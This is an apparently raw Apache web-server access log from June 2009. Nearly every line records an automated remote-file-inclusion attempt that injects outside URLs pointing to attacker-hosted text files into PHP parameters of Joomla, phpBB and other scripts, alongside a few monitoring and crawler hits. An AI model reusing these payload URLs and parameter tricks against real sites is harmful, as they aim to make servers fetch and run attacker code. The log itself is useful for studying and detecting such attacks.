85.17.162.28 - - [20/Jun/2009:02:48:01 -0400] "GET /logs/error_log.Q109053100/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 233 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.117.128.143 - - [20/Jun/2009:02:48:03 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.117.128.143 - - [20/Jun/2009:02:48:03 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.117.128.143 - - [20/Jun/2009:02:48:04 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.208.139.72 - - [20/Jun/2009:02:48:08 -0400] "GET /logs/access_log.Q109060600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.117.128.143 - - [20/Jun/2009:02:48:09 -0400] "GET /logs/access_log.Q109060600%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.208.139.72 - - [20/Jun/2009:02:48:31 -0400] "GET /logs/access_log.Q109051200//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:02:49:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.30.80 - - [20/Jun/2009:02:49:41 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [20/Jun/2009:02:49:41 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [20/Jun/2009:02:49:41 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [20/Jun/2009:02:49:46 -0400] "GET /logs/access_log.Q109060600%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:02:51:48 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:02:51:48 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:02:51:48 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:02:51:51 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:02:51:51 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:02:51:51 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:52:00 -0400] "GET /logs/access_log.Q109051000//errors.php?error=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:02:52:28 -0400] "GET /logs/error_log.Q109052800/?_SERVER[DOCUMENT_ROOT]=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.17.162.28 - - [20/Jun/2009:02:52:28 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.17.162.28 - - [20/Jun/2009:02:52:28 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 200 6242 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
210.115.58.73 - - [20/Jun/2009:02:52:28 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:02:52:29 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:52:38 -0400] "GET /logs/access_log.Q109052400//errors.php?error=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:52:48 -0400] "GET /logs/access_log.Q109051000//errors.php?error=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:53:21 -0400] "GET /logs/access_log.Q109052400//errors.php?error=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:53:27 -0400] "GET /logs/access_log.Q109050300/?_SERVER[DOCUMENT_ROOT]=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:02:54:29 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:02:54:30 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:02:54:30 -0400] "GET /logs/access_log.Q109060600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:02:54:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.17.162.28 - - [20/Jun/2009:02:54:53 -0400] "GET /logs/error_log.Q109052800/?_SERVER[DOCUMENT_ROOT]=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 224 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.17.162.28 - - [20/Jun/2009:02:54:53 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 200 409 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.17.162.28 - - [20/Jun/2009:02:54:53 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 200 6242 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
210.8.66.19 - - [20/Jun/2009:02:56:09 -0400] "GET /logs/access_log.Q109050800//e404.php?INCLUDE_FOLDER=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:02:56:15 -0400] "GET /logs/access_log.Q109051300//e404.php?INCLUDE_FOLDER=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:02:56:20 -0400] "GET /logs/access_log.Q109051200//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:02:56:53 -0400] "GET /logs/access_log.Q109061200%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:02:56:54 -0400] "GET /logs/access_log.Q109061200%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:02:56:55 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:02:56:58 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
216.117.128.143 - - [20/Jun/2009:02:56:58 -0400] "GET /logs/access_log.Q109060600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:02:57:03 -0400] "GET /images/index4_straigthand.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
200.101.192.223 - - [20/Jun/2009:02:57:37 -0400] "GET /logs/access_log.Q109052600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.76"
200.101.192.223 - - [20/Jun/2009:02:57:37 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.76"
200.101.192.223 - - [20/Jun/2009:02:57:37 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
216.117.128.143 - - [20/Jun/2009:02:57:47 -0400] "GET /logs/access_log.Q109051200//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:57:51 -0400] "GET /logs/access_log.Q109052500%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:57:56 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:57:58 -0400] "GET /logs/access_log.Q109061100%20%20/index.php?lg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:57:59 -0400] "GET /logs/access_log.Q109061100%20%20/index.php?lg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:02:58:06 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:02:58:06 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:02:58:06 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
82.194.87.219 - - [20/Jun/2009:02:58:30 -0400] "GET /logs///errors.php?error=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 215 "-" "libwww-perl/5.822"
66.46.177.182 - - [20/Jun/2009:02:58:42 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:02:58:42 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:02:58:42 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.117.128.143 - - [20/Jun/2009:02:58:45 -0400] "GET /logs/access_log.Q109060600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:58:58 -0400] "GET /logs/access_log.Q109050300/?_SERVER[DOCUMENT_ROOT]=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.6.17.151 - - [20/Jun/2009:02:57:41 -0400] "GET /images/ACE_SitePrepOsteotomes.pdf HTTP/1.0" 200 5037385 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.142.249 - - [20/Jun/2009:02:59:24 -0400] "GET /logs/access_log.Q109060600%20%20/e404.php?DOCUMENT_ROOT=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:02:59:24 -0400] "GET //skin/zero_vote/error.php?dir=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:02:59:24 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:02:59:24 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.122.142.249 - - [20/Jun/2009:02:59:25 -0400] "GET /logs/access_log.Q109050800%20%20/e404.php?DOCUMENT_ROOT=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:02:59:26 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:02:59:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.98.209.71 - - [20/Jun/2009:02:59:44 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
216.117.128.143 - - [20/Jun/2009:02:59:55 -0400] "GET /logs/access_log.Q109051200//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:03:00:00 -0400] "GET /logs/access_log.Q109060900/?_SERVER[DOCUMENT_ROOT]=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:03:00:05 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:03:00:22 -0400] "GET /logs/access_log.Q109052500%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:03:00:23 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
216.117.128.143 - - [20/Jun/2009:03:00:26 -0400] "GET /logs/access_log.Q109060600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
82.194.87.219 - - [20/Jun/2009:03:01:08 -0400] "GET /logs///errors.php?error=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 215 "-" "libwww-perl/5.822"
81.223.126.82 - - [20/Jun/2009:03:01:33 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 200 6247 "-" "Mozilla/5.0"
81.223.126.82 - - [20/Jun/2009:03:01:33 -0400] "GET /logs/access_log.Q109061300%20%20//?path%5Bdocroot%5D=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
81.223.126.82 - - [20/Jun/2009:03:01:37 -0400] "GET //?path%5Bdocroot%5D=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
216.117.128.143 - - [20/Jun/2009:03:01:50 -0400] "GET /logs/access_log.Q109051200//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.80.195.34 - - [20/Jun/2009:03:02:10 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSOCD; AtHome020; Q312461; FunWebProducts; .NET CLR 1.1.4322)"
66.249.71.14 - - [20/Jun/2009:03:02:28 -0400] "GET /logs/error_log.Q108101700 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.98.209.71 - - [20/Jun/2009:03:02:52 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:03:02:55 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.165.73.157 - - [20/Jun/2009:03:03:48 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.165.73.157 - - [20/Jun/2009:03:03:48 -0400] "GET /logs/access_log.Q109050700//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.165.73.157 - - [20/Jun/2009:03:03:48 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
83.222.193.94 - - [20/Jun/2009:03:04:12 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:03:04:13 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:03:04:14 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:03:04:20 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:03:04:20 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:03:04:20 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:03:04:26 -0400] "GET /logs/index.php?pag=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:03:04:26 -0400] "GET /index.php?pag=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:03:04:26 -0400] "GET /logs/access_log.Q109061000%20%20/index.php?pag=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
124.217.216.86 - - [20/Jun/2009:03:04:26 -0400] "GET /logs/access_log.Q109050700//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 301 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:03:04:26 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 279 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:03:04:26 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:03:04:26 -0400] "GET /logs/access_log.Q109053000//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 301 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
209.59.12.99 - - [20/Jun/2009:03:04:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.165.73.157 - - [20/Jun/2009:03:04:37 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
83.222.193.94 - - [20/Jun/2009:03:04:49 -0400] "GET /logs/access_log.Q109060600%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
